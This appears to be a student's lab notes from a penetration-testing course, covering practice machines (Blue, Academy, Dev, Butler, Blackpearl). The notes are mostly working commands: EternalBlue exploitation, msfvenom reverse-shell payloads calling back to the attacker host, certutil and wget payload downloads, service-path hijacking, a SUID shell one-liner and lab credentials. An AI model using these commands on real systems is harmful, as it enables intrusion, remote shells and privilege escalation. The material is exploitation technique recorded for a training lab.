PORTSTATESERVICEVERSION135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn445/tcpopenmicrosoft-dsWindows7Ultimate7601ServicePack1microsoft-ds (workgroup: WORKGROUP)49152/tcpopenmsrpcMicrosoftWindowsRPC49153/tcpopenmsrpcMicrosoftWindowsRPC49154/tcpopenmsrpcMicrosoftWindowsRPC49155/tcpopenmsrpcMicrosoftWindowsRPC49156/tcpopenmsrpcMicrosoftWindowsRPCMACAddress:00:0C:29:33:BE:EE (VMware)Devicetype:generalpurposeRunning:MicrosoftWindows7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
NetworkDistance:1hopServiceInfo:Host:WIN-845Q99OO4PP; OS:Windows; CPE:cpe:/o:microsoft:windowsHostscriptresults:|smb2-security-mode:|2:1:0:|_Messagesigningenabledbutnotrequired|smb2-time:|date:2024-07-13T20:57:32|_start_date:2024-07-13T20:49:44|_nbstat:NetBIOSname:WIN-845Q99OO4PP,NetBIOSuser:<unknown>,NetBIOSMAC:00:0c:29:33:be:ee (VMware)|_clock-skew:mean:1h19m51s,deviation:2h18m33s,median:-8s|smb-os-discovery:|OS:Windows7Ultimate7601ServicePack1 (Windows 7Ultimate6.1)|OSCPE:cpe:/o:microsoft:windows_7::sp1|Computername:WIN-845Q99OO4PP|NetBIOScomputername:WIN-845Q99OO4PP\x00|Workgroup:WORKGROUP\x00|_Systemtime:2024-07-13T16:57:32-04:00|smb-security-mode:|account_used:guest|authentication_level:user|challenge_response:supported|_message_signing:disabled (dangerous, butdefault)TRACEROUTEHOPRTTADDRESS10.68ms192.168.31.132
[+] 192.168.31.132:445 - Host is likely VULNERABLE to MS17-010!-Windows7Ultimate7601ServicePack1x64 (64-bit)
useexploit/windows/smb/ms17_010_eternalblueoptionssetRHOSTS192.168.31.132check# Same as auxiliary/scanner/smb/smb_ms17_010 modulesetpayloadwindows/x64/meterpreter/reverse_tcpsetLHOST192.168.31.131# Listening HOST/Kalirun
cd~/tcm/peh/blue/AutoBlue-MS17-010/shellcode./shell_prep.sh# kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)# y# LHOST for reverse connection:# 192.168.31.131# LPORT you want x64 to listen on:# 8888# LPORT you want x86 to listen on:# 2222# Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell# 1# Type 0 to generate a staged payload or 1 to generate a stageless payload# 0cd.../listener_prep.sh# Starts a listener
# Open another Terminalcd~/tcm/peh/blue/AutoBlue-MS17-010/python2eternalblue_exploit7.py192.168.31.132shellcode/sc_all.bin
# exit ftpcatnote.txtHelloHeath!Grimmiehassetupthetestwebsiteforthenewacademy. I told him not to use the same password everywhere, he will change it ASAP. I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:
INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');
TheStudentRegnonumberiswhatyouuseforlogin.Lemeknowwhatyouthinkofthisopen-sourceproject,it's from 2020 so it should be secure... right ? We can always adapt it to our needs. -jdelta
# Kali VMmkdir~/toolscd~/toolswgethttps://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.shchmod+xlinpeas.shpython3-mhttp.server
# Target reverse shellcd/tmpwgethttp://192.168.31.131:8000/linpeas.sh# the file will be copied to the target machine# Run LinPEASchmod+xlinpeas.sh./linpeas.sh
# Kalisshgrimmie@192.168.31.128# Paste My_V3ryS3cur3_P4ss passwordgrimmie@academy:~$sudo-lhistorycat/home/grimmie/backup.sh#!/bin/bashrm/tmp/backup.zipzip-r/tmp/backup.zip/var/www/html/academy/includeschmod700/tmp/backup.zipcrontab-l# no crontab for grimmiecrontab-uroot-l# must be privilegedsystemctllist-timers
➡️ pspy - Monitor linux processes without root permissions
Download pspy64 and move it into the ~/tools dir where Python HTTP server is running
# Targetcd/tmpwgethttp://192.168.31.131:8000/pspy64chmod+xpspy64./pspy64# Wait for the backup.sh to run
cd~/tcm/peh/devssh-iid_rsajeanpaul@192.168.31.130# Enter passphrase for key 'id_rsa':# Try the Database found password# I_love_javajeanpaul@dev:~$sudo-l# /usr/bin/zip can be run as elevated privileges
look for Sudo - If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudoarp-scan-l# Butler IP 192.168.31.133mkdir-p~/tcm/peh/butlercd~/tcm/peh/butler/
sudonmap-p--A-T4192.168.31.133-oAbutler
PORTSTATESERVICEVERSION135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn445/tcpopenmicrosoft-ds?7680/tcpopenpando-pub?8080/tcpopenhttpJetty9.4.41.v20210516|_http-title:Sitedoesn't have a title (text/html;charset=utf-8).| http-robots.txt: 1 disallowed entry |_/|_http-server-header: Jetty(9.4.41.v20210516)49664/tcp open msrpc Microsoft Windows RPC49665/tcp open msrpc Microsoft Windows RPC49666/tcp open msrpc Microsoft Windows RPC49667/tcp open msrpc Microsoft Windows RPC49668/tcp open msrpc Microsoft Windows RPC49669/tcp open msrpc Microsoft Windows RPCMAC Address: 00:0C:29:06:23:B3 (VMware)Device type: general purposeRunning: Microsoft Windows 10OS CPE: cpe:/o:microsoft:windows_10OS details: Microsoft Windows 10 1709 - 1909Network Distance: 1 hopService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_nbstat: NetBIOS name: BUTLER, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:06:23:b3 (VMware)|_clock-skew: 8h59m49s| smb2-time: | date: 2024-07-14T19:54:50|_ start_date: N/A| smb2-security-mode: | 3:1:1: |_ Message signing enabled but not requiredTRACEROUTEHOP RTT ADDRESS1 0.65 ms 192.168.31.133
# Kali VMcd~/toolswgethttps://github.com/peass-ng/PEASS-ng/releases/download/20240714-cd435bb2/winPEASx64.exemvwinPEASx64.exewinpeas.exepython3-mhttp.server80
# Target reverse shellcdc:\Users\butlercertutil.exe-urlcache-fhttp://192.168.31.131/winpeas.exewinpeas.exe# the file will be copied to the target machine# Run LinPEASwinpeas.exe
Look for useful (red color) information, quick wins for privilege escalation
Abuse misconfigured services, possible when path the the service is not quoted and there are spaces in the path
WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
YOUCANMODIFYTHISSERVICE:AllAccessFilePermissions:Administrators [AllAccess]PossibleDLLHijackinginbinaryfolder:C:\ProgramFiles (x86)\Wise\Wise Care 365 (Administrators [AllAccess])
Drop an exploit binary into the C:\Program Files (x86)\Wise\ directory
# Generate an exploitmsfvenom-pwindows/x64/shell_reverse_tcpLHOST=192.168.31.131LPORT=7777-fexe>Wise.exepython3-mhttp.server80# New terminalnc-nvlp7777
# Target reverse shellcdC:\ProgramFiles (x86)\Wise\certutil.exe-urlcache-fhttp://192.168.31.131/Wise.exeWise.exe# Stop the running servicescstopWiseBootAssistantscqueryWiseBootAssistantscstartWiseBootAssistant
Reverse shell as system
Blackpearl
O.S. - Debian 10
Credentials:
root:tcm
sudoarp-scan-l# Butler IP 192.168.31.129mkdir-p~/tcm/peh/blackpearlcd~/tcm/peh/blackpearl/
dnsrecon-r127.0.0.0/24-n192.168.31.129-dtest[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255[+] PTR blackpearl.tcm 127.0.0.1[+] 1 Records Found
This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. The module then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
/usr/bin/php7.3-r"pcntl_exec('/bin/sh', ['-p']);"# This will run /bin/sh as root user